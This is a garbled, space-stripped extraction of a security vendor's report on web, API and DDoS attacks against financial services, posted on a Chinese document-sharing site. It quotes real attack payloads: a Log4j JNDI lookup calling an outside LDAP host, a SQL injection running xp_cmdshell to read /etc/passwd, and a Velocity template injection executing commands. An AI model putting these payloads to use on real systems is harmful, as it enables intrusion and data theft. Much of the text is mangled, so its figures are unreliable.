版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
ssue [StateoftheInternet]Tableofcontents2Introductionrsends32SummaryCreditsEnemyattheGatesVolumeIssueSOTI1IntroductionesthathavebeentheheaviesthitbydotherbankingtrojanstoDistributedisavitalsectorthatplaysamajorrolenotonlyinthelivesofpeople,butalsointheglobaleconomy.Anydisruptionordowntimeoffinancialservicescarriesseriousimplications,andthesensitivedatatheseorganizationsholdcanbeturnedintoawiderangeofattacksagainstthem,fromnewlydiscoveredzero-dayvulnerabilitiestotried-and-truephishingattacks.snosecretthenthatattackersarehighlyfocusedandmotivatedtoattacktheshingorfraudbutthistimewehavetakenamuchbroaderapproachandcoveranumberofissuesaffectingthisoftenattackedindustry.hisbroaderlenshasallowedustoseetheimmensesurgeinthenumberofattacksondustryandthealarmingspeedatwhichattackersareleveragingalargeportionofattackerschoosingtoforgoattacksononeofthemostsecureindustriesintheworld,andinsteadattacktheirconsumersenmasse.Withthisenemystandingatthegate,itisimportantforFinServsecurityprofessionalstounderstandhowthethreatlandscapeisshifting.Ourreportincludesthesekeypoints:EnemyattheGatesVolumeIssueSOTI2Thefinancialservicesindustryconsistentlyranksinthetopthreetargetedverticalsforwebapplicationthehighestgrowthofanymajorindustry.Within24hours,theexploitationofrabilitiesnreachmultiplethousandsofattacksperhourandpeakquickly,affordinglittletimetopatchandreact.AsignificantincreaseinLocalFileattacksdemonstrateshowattackersareshiftingtowardremotettemptsthatntheinternalsecuritynetwork.tomersisrampantckersfocusingoncustomeraccountsratherthantheorganizationsthemselves,eitherdirectlyorviaphishing-relatedactivities.hingcampaignslikeKrptoareintroducingtechniquesthatbypasstwo-factorauthentication(2FA)solutionsusingone-timepasswordtokensorpushnotifications.EnemyattheGatesVolumeIssueSOTI3Thethreatlandscape:attacksonfinancialservicesgrowThefinancialservicesverticalcontinuestobeoneofthemostwidelyattackedindustriesintheworldandthenumberofattacksshowssignsofgrowing.WebapplicationandAPIattacksinparticularareincreasingatanalarmingratewhilealsogrowingincomplexity.Attackersareseekingtogainafootholdtointernalnetworksandcausedisruptionasameansofpressuringorganizationstopaymoneytopreventfurtherdamages.AsavitalalservicesneedtobeupandrunningAttackerscouldalsomonetizestolensensitiveinformationorgainaccesstocustomer’saccountsandstealtheirmoney.havesettheirsightsonfinancialservicesanditscustomersandassuchybersecurityawarenessandincreaseitsITbudgeturityFailuretosafeguardtheirperimeteranddatacouldresultinbreachesbyransomwareandotherthreatsandconsequentlysignificantcriticaldataandfinancialabreachesagainstfinancialservices,whichisconsidered“criticalinfrastructure,”hasanaveragecostofUSmillionEnemyattheGatesVolumeIssueSOTI4Tofullyunderstandthevariousrisksthatfinancialservicesface,wemustlookatthethreatlandscapeasawholeTodoso,weturntoamultitudeofdataonactivitiessuchasbottrends(bothmaliciousandbenign),exploitationattemptsagainstcriticalmpaignsWealsoprobeattheattacker’sInternetProtocol(IP)todrawoutconclusionsregardingtheattacker’smotivations.Welookatayear’sworthofdatatocreateasnapshotofthefinancialservicesthreatlandscape(Figure1).Atthefeetviewfinancialservicestopthelistofattackedverticalsinseveralexploitation,andbotnetactivities.MostconcerningistheaforementionedstaggeringndAPIattacksaxgrowthinthenumberofattacksagainstfinancialservices.Botnetactivitiesarealsoontherisearoundfinancialservicesorganizations.increaseinwebapplicationscks881%botactivity222%increaseinDDoStargetsEachvectorpresentsdifferentsecurityrisksandchallengesthatfinancialservicesneedtoaddresstoenhancetheirsecuritypostureAsweprogressthroughthereportwewillexaminevariousattackvectorsinmoredetail,butoverall,thisreportjustifiesthefinanceindustry’sinvestmentincybersecurity.EnemyattheGatesVolumeIssueSOTI5Growingsecurityrisk:applicationandAPIattacksWebapplicationsandAPIscontinuetobeanimportantconsiderationforfinancialservices.Theyarekeytomanytransformationeffortsandthey’rehowbanksopenuptothirdpartiestocreatebetterexperiencesforcustomersandtogainmorevalueandcompetitiveappstoavailawiderangeofbankingservices.Althoughtheusageofbankingappswasboomingpriortothestancessurroundingthepandemiceglockdownsfurtherincreasedtheiruse.ManyorganizationsareadoptingtheuseofAPIintotheirecosystembecauseofitsnotabletheStateoftheAPIreportfromPostmanofrespondentscitedinvestmentsinAPIdevelopmentswilllikelyincreasethisyearInotherinstanceservicesproviderscouldaccesstheircustomerdatainrelationtoloans,accounts,etc.standardizedthedataconnectionorexchangeofcustomerfinancialinformationamongorganizationsandthirdparties.Webapplications,onniencefasterprocessingandreliabilitytheyoffertocustomers,andreducecostsforfinancialservicesorganizations.However,thevulnerabilitiesinthesewebapplicationscouldallowattackerstocompromiseemanybenefitsandadvantages,theycouldalsointroduceanewattacksurfaceforcybercriminalstoemploy.amassiveincreaseoverthepastmonths,andfinancialservicescontinuestofeatureprominentlyamongtargetedindustries.Inouranalysiswefoundfinancialservicestobethethirdmostattackedverticalwith%ofoverallattacks,followingcloselyontheheelsofhightechnology,thesecond-mosteFormostoftheyearfinancialserviceshadsurpassedhightechnologyforthelargestnumberofoverallattacks.Atthe10,000-feetview,financialservicestopthelistofattackedverticalsinseveralcriticalareas:webapplicationmergingvulnerabilitiesexploitation,andbotnetactivities.EnemyattheGatesVolumeIssueSOTI6VerticalCommerce HighVerticalCommerce HighTechnologyFinancialServices VideoMedia ManufacturingOtherDigitalMediaPublicSectorSocialMediaGamingBusinessServicesGamblingPharma/HealthcareNonprofit/EducationWebAppsandAPIAttacksbyIndustry20%320%30%40%TheimportanceofwebapplicationandAPIsinfinancialservicesoperationscontinuestoinviteattackerstolookforvulnerabilitiesandwaysofattackingorganizations.First,ecurityisatoughchallengewhenbuildingthemVulnerabilitiesresidinginthesewebocaptureandstoreconfidentialcustomerinformation(i.e.,logincredentials).Onceattackerslaunchwebapplicationsattackssuccessfully,theycouldstealconfidentialccesstoanetworkandobtainmorecredentialsthatcouldallowthemtomovelaterally.Asidefromtheimplicationsofabreach,stoleninformationcouldbepeddledintheundergroundorusedforotherattacks.hisishighlyconcerninggiventhetrovesofdatasuchaspersonalidentifiableinformationandaccountdetails,heldbythefinancialservicesvertical.AttacksonfinancialserviceswebapplicationsandAPIsareontheriseandsignifyacontinuedandgrowinginterestinfinancialservicesandtheircustomers.ThisyearhasacksonfinancialservicesThisrepresentsthewiththeexceptionofgamblingwhichdoesnotseeasignificantamountofwebapplicationfirewall(WAF)attacksoverall.Thisincreaserepresentsthegrowinginterestinattacksurfacesthatmayleadtofinancialservicesbreaches.EnemyattheGatesVolumeIssueSOTI7AttackCountAttackCountDailyWebAppsandAPIAttacks—FinancialServicesOverthepastmonthsfinancialserviceshasseenconsistentattackgrowthandthespikesobservedinFigure3seemstoindicatetargetedorfocusedattacks.Morethanthat,thesepatternscouldsuggestthegrowingriskofwebapplicationattacksagainstbyPositiveTechnologiesshowedbreachofpersonalppssincevulnerabilitiesresidingtherecouldbeusedasannttobreachtargetorganizationsUnderstandingthetypesofattacksandwhatldhelporganizationsknowhowtoproperlyprotectthesewebappsEnemyattheGatesVolumeIssueSOTI8AttackCountAttackCountervingregionaltrendsgivesusanopportunitytocomparegrowthinvariousareasoftheworld(Figure4).RegionalTrends202220222020212020212020212020222021202022nnexponentialgrowthinLatinAmericaLATAMThedigitizationandlimitedcybercrimegovernancecouldbetwoofthefactorsthatcontributetothegrowingalactivitiesintheregionCybercrimecoststheregionUSbillionannuallyhreatsintheregionincludecryptojackingfraudbankingtrojansandransomware,illustratingthatcybercrimeinLATAMismorefinanciallymotivated.Justthislgovernmentwebsitesshowingthecripplingeffectsofransomwareasaservice(RaaS)beyondfinanciallosses.AcloserlookattheregionshowsusthatBraziltopsthelistofwebapplicationandAPIattacktargets.InBrazil,duetothehighusage/adoptionofonlinelatedthreatsewithanincreasingnumberofcyberattacksherieswithPIattacksinAPJEnemyattheGatesVolumeIssueSOTI9nandAPIattacksTheRussianandUkrainianconflictspurredwarningsofpotentialcyberattacksandretaliationagainstthefinancialsectorbothintheUnitedrvicescompaniesintheUnitedStateshadsufferedfromransomwarebankingtrojansandothermalware.theFINcybercriminalgroupbreachingcertainUSfinancialakedpaymentrecordsofbanksintheUnitedoundmarketplacesTomitigatetheCurrencyfinalizedarulein2021thatnecessitates“incidentnotification”bothtoafederalregulatorandtothebankingorganizations’customersduringsuspectedthreats.eshaslegislationonSecurityofNetworkandInformationuidanceandbaselineswhenitcomestocybersecurityanddataprotectioninthefinancialservicesandotherverticals.Althoughtheseregulationshelporganizationsbecomecyberresilient,itdoesnotnecessarilyfollowthattheorganizationsbecomeimmunetocyberattacks.SamplesofnotablecyberthreatsthatmaycontributetothisincludeBizarro,abankingtrojanthatextendeditstargetstoincreaseinattack/payloaddeliveryattempts.gdomhadthemostwebsinEuropeMiddleThisdatapointstothecontinuedinvestmentcriminalorganizationsareputtingintoleveragingautomationandreconnaissanceanditeratingmethodstoavoidruleslikegeoblocks.Thecontinuousrefinementofsecurityoleranceandensuringallinternetfacingcapabilitiesareunderacommonsecurityportfolio,areessential.EnemyattheGatesVolumeIssueSOTI10VectorsusedinapplicationandAPIattacksTounderstandthenatureoftheattacks,wecanzoomintothevariousattackvectorscommonlyusedagainstthisindustry.Itiscriticaltolookatvectorstobetterunderstandyourrisksandwhattypesofattacksyourorganizationwilllikelyencounter.Andthen,withthatknowledge,youcandevisemitigationstrategiestorampupyourdefensesagainsttheseattacksandpreventbreaches.WebApplicationandAPIAttacksbyVectorLFIXSSSQLiPHPiJSICMDiRFwthhasbeenprimarilydrivenbyfootholdintheirtargets’networks,ratherthansimplytoaccessadatabase.albleEnemyattheGatesVolumeIssueSOTI11vulnerabilitiestoinjectcodeintowebsites,andtheneachtimeusersvisitanycompromisedwebsite,theyareatriskofinformationexposure.AnothertypeofXSSisdeliveredfromtheattackertothevictimsviamaliciouslinksthatleadtothedownloadofapayload.Attackerstypicallyemploythisvectortoconductphishingattacksaswellaswebsitedefacement.ThehypergrowthinwebapplicationsandAPIattacksinthefinancialservicesverticalisanareaofconcernparticularlybecauseofitssecurityimplicationsHoweverhavingaclearknowledgeofattacksurfacesandvectorscouldaidfinancialservicescompaniesinsecuringtheirenvironment.Inthissection,wedemonstrateactualattackattemptsagainstfinancialservices.AsesamixofattackvectorsandvulnerabilitiesincludingrecentCVEsYoullseeinFigurethroughFigurethatsomeoftheattacksarecustomizedspecificallyfortheirintendedtarget,whilesomearemoregenericforpurposesofreconnaissance.aa=%3Cscript%20src%3D%24%7Bjndi%3Aldap%3A%2F%2F[REDACTED].com.80.s.mur.5ed.xyz%3A53%2F[REDACTED].com%7D%3Ealert()%3C%2Fscript%3Eaa=<scriptsrc=${jndi:ldap://[REDACTED].com.80.s.mur.5ed.xyz:53/[REDACTED].com}>alert()</script>attackerdomain.Itappearsthatthescriptishandcraftedtotheirspecifictargets.Moreover,stheattackertorunthescriptviaexploitationofOGNLvulnerabilitiesEnemyattheGatesVolumeIssueSOTI12EmployingvariousattackmethodsqkSOqkSO=9983AND1=1UNIONALLSELECT1,NULL,’<script>alert(“XSS”)</script>’,table_nameFROMinformation_schema.tablesWHERE2>1--/**/;EXECxp_cmdshell(‘cat../../../etc/passwd’)#ainingpersistenceqq=1&&wt=velocity&v.template=custom&v.template.custom=#set($x=%27%27)+#set($rt=$x.class.forName(%27java.lang.Runtime%27))+#set($chr=$x.class.forName(%27java.lang.Character%27))+#set($str=$x.class.forName(%27java.lang.String%27))+#set($ex=$rt.getRuntime().exec(%27cat%20/%65%74%63/%70%72%6f%66%69%6c%65%27))+$ex.waitFor()+#setv$out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#endqq=1&&wt=velocity&v.template=custom&v.template.custom=#set($x=’’)#set($rt=$x.class.forName(‘java.lang.Runtime’))#set($chr=$x.class.forName(‘java.lang.Character’))#set($str=$x.class.forName(‘java.lang.String’))#set($ex=$rt.getRuntime().exec(‘cat/etc/profile’))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($iin[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#endtwareAnattackertriestoimplementRCEthroughmaliciouscodeinjectionoftheVelocitytemplateengine.Morespecifically,theattackerdumpsthecontentofthe/etc/profileUnixfile,whichisusedtosetsystem-wideenvironmentvariablesonusersshellsAttackersareprobingtoseeifthesystemisetheycangainpersistenceEnemyattheGatesVolumeIssueSOTI13ydisclosedvulnerabilitiesThesignificanceofapplicationandAPIattacksliesnotonlyinthegardenvarietyattacksghtussecurityhazardscriticalrabilitiestendtobeexploitedviaaplethoraoflesserknownvectorssuchOrganizationsareconsistentlyadvisedtopatchvulnerabilitiestoreducetheirwindowsofbeforedeployment,andprioritizingwhichvulnerabilitiestoaddressfirstcantaketime(ascanpatchfailuresThereforeitbecomesaraceagainsttimetoaddressthesesecurityflawsbeforeattackersstartexploitingthemtolaunchattacks.Forinstance,fiveminutesbilityintheirExchangeServertheHafniumrtedlyalreadyscanningforvulnerabilitiesTounderstandthelevelrabilitytoseehowitsappliedbyattackersagainstfinancialservices.lnerabilitieswehavefoundthatthefinancialservicesverticalisnearlyalwaysinthetopthreeofaffectedindustries,andtherisktheseattacksrithacriticalratingofthoughwehavefoundsignificantriskinothernewvulnerabilities,asinthecaseofLog4j.eviousblogpost,wediscussedtheincreasedexploitationofthisvulnerabilityinthedaysfollowingtheadvisorypublication.Forthisreport,wetookacloserlookattheinfluxofattackattemptsemployingthiscriticalflawagainstfinancialservices.Itiscrucialtohighlightttackersarequicktoleveragesuchsecuritybugsfortheirattacksandthedetrimentaleffectsitcouldposetoorganizationsiftheyfailtosecuretheirperimeter.EnemyattheGatesVolumeIssueSOTI14TopIndustriesbyAttackCount—ConfluenceVulnerabilityOtherDigitalMedia1.1%PublicSector0.9%Gambling0.8%BusinessServices0.6%Pharma/Healthcare0.3%Nonprofit/Education0.09%chnologyandexploitationattemptsoffinancialservicesversusallotherindustriesthatfollowthosetopitalmediamanufacturinggamblingbusinessservices,pharma/healthcare,gaming,socialmedia,andnonprofit/education.Itisnotablethatthefinancialservicesindustryequalsall11industriesthatfollowit,combined(Figure11).EnemyattheGatesVolumeIssueSOTI155/22/20225/29/20226/05/20226/06/20226/19/20225/20/20225/22/20225/24/20225/26/20225/28/20225/30/20226/1/20226/3/20226/5/20226/7/202265/22/20225/29/20226/05/20226/06/20226/19/20225/20/20225/22/20225/24/20225/26/20225/28/20225/30/20226/1/20226/3/20226/5/20226/7/20226/9/20226/11/20226/13/20226/15/20226/17/20226/19/20226/21/20226/23/2022NumberofExploitationAttemptsFigureandFiguredetailthenumberofattemptedexploitationsoftheConfluencevulnerabilityagainstthefinancialservicesvertical.Ananalysisofthedatarevealsthatinlessthan48hoursafterthedisclosure,exploitationattemptsagainstfinancialservicesedonJuneatUTCwithaedattackWealsoobservedaeonJuneNumberofExploitationAttempts(DetailedView)10k8kk4k2k0EnemyattheGatesVolumeIssueSOTI165/22/20225/29/20226/05/20226/12/20225/22/20225/29/20226/05/20226/12/20226/19/2022Thisexploitationrateisnotlimitedtothisparticularvulnerabilityaswe’veobservedalarrushtoexploitneworzerodayvulnerabilitiesagainstfinancialservicesasinthecaseofLog4jvulnerability.Thisseemstoindicatethatemergingvulnerabilitiesisoneofthetried-and-testedmethodsofinfiltratinganetwork,andthefinancialservicesindustryvulnerabilities.It’simperativethatorganizationskeepsystemsandappsupdatedtoenhancetheircybersecurityposture.NumberofUniqueIPsTheConfluencevulnerabilityisjustoneofthemanyexamplesofhowquicklyattackersabilitiestobreachanorganizationTheimportanttakeawayhereisfororganizationstosecuretheirinternet-facingassetswithtoolsthatallowforthemonitoringonandAPIattacksandtomakesuretheypatchonaregularbasistopreventsuchattacks.Incaseofemergingvulnerabilities,timeisoftheessence.Toavoidabreach,cybersecuritypractitionersmustconsiderthestepsneededtomitigaterabilitiessuchashavingsecuritymeasureslikeWAFstodetectmalicioustrafficerresponseinplaceEnemyattheGatesVolumeIssueSOTI17GamingFinancialServicesHighTechnology ManufacturingGamingFinancialServicesHighTechnology Manufacturing GamblingCommercePharma/HealthcareNonprofit/Education VideoMedia BusinessServicesPublicSectorOtherDigitalMediaSocialMediaDDoSattacks:shiftinregionaltargetsDDoSattacksfiguredprominentlyinattacksagainstfinancialinstitutionsprimarilyduringeenRussiaandUkraineBeforetheonsetofthephysicalwarinMarch2022,itappearsthata“cyberwar”transpiredfirstwithbothsideslaunchingaslewofanksitesdisruptthecesastheirSairportsthoughtheairports’operationswerenotimpacted.TopIndustriesbyDDoSAttack40%mosttargetedindustryinDDoSattacksnexttogamingFigureAttackersarepotentiallygoingafterabroaderrangeoftargetsineveryverticalandmovingquicklyamongthemtocircumventtheirdefenses.observeda“regionalshift”asthevolumeofDDoSattacksagainstedMeanwhileEMEAattackvolumehasincreased,despitetheloweroverallnumberoftargets.EnemyattheGatesVolumeIssueSOTI1810/1/202111/1/202112/1/20211/1/20222/1/20223/1/20224/1/2022510/1/202111/1/202112/1/20211/1/20222/1/20223/1/20224/1/20225/1/20226/1/20227/1/20228/1/20229/1/202210/1/2022ervicesilylevelWhileDDoSattacksremainsteadyFigureit’sworthnotingtheshiftofattacksrlookatyearoveryeargrowthseemstoindicatethatwhiletheUnitedStatestypicallyleadsinmosttypesofattacks,inrecentmonths,theirvolumeofnumberoftargets.EnemyattheGatesVolumeIssueSOTI19AttackCount20222021AttackCount20222021202120222021202220212022DDoSAttackCountbyRegion21–2022rbetweenUkraineandRussiafDDoSattacksagainstUKfinancialfirmsandothercyberattacksagainstWesternEuropeancountriesthatexpressedsupportforroupKillnetalsolaunchedattacksagainstwebsitesofItaly’ssenate,NationalHealthInstitute,andotherinstitutions,monthsafterthewarstarted.TheseDDoSattackscouldpotentiallybearetaliationagainstthosewhosupportpoliticsspillingintocyberspaceripplethebusinessoperationsoffinancialservicesDowntimebusinessdisruption,andrecoveryfromsuchattackscouldmeanfinanciallosstotheouldtaketheirwebsitesandservicesofflineandcouldimpacttheircustomersandbusinessoperationsingeneral.AneffectiveDDoSattackbasicallymeansabusinessiscutofffromtherestoftheinternet;customersareunabletoaccessaccountsandbusinessesmightthereforelosemoney.InancostfromapproximatelyUSuptoEnemyattheGatesVolumeIssueSOTI20Theramificationsoffallingvictimtosuc
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 航空公司航班运行操作规范(标准版)
- 互联网行业网络安全防护与管理指南
- 制造业产品质量控制流程指南(标准版)
- 物业管理与服务规范操作流程
- 餐饮行业食品安全管理体系指南(标准版)
- 企业内部培训与员工职业发展实施指南
- 图书馆服务规范与流程指南
- 麻醉科感染护理防控管理
- 航空货运安全检查指南
- 国际物流服务规范(标准版)
- 7.2“白山黑水”-东北三省 第2课时(教学设计)初中地理人教版(2024)八年级下册
- 2025年湖南工业职业技术学院单招职业技能测试题库附答案解析
- 期末考前满分冲刺之压轴题(教师版)-浙教版(2024)九上
- 2025年交管12123驾照学法减分考试题库(附含答案)
- 2025年湖北事业单位联考《职业能力倾向测验》A类试题及答案
- 2025年义务教育信息技术新课程标准考试测试题及部分答案
- 《土木工程智能施工》课件 第1章 绪论
- 骨质疏松防治指南课件
- 滴滴人证考试试题及答案
- (一模)太原市2025年高三年级模拟考试(一)英语试卷(含标准答案)
- 非财务人员的财务管理培训通用课件
评论
0/150
提交评论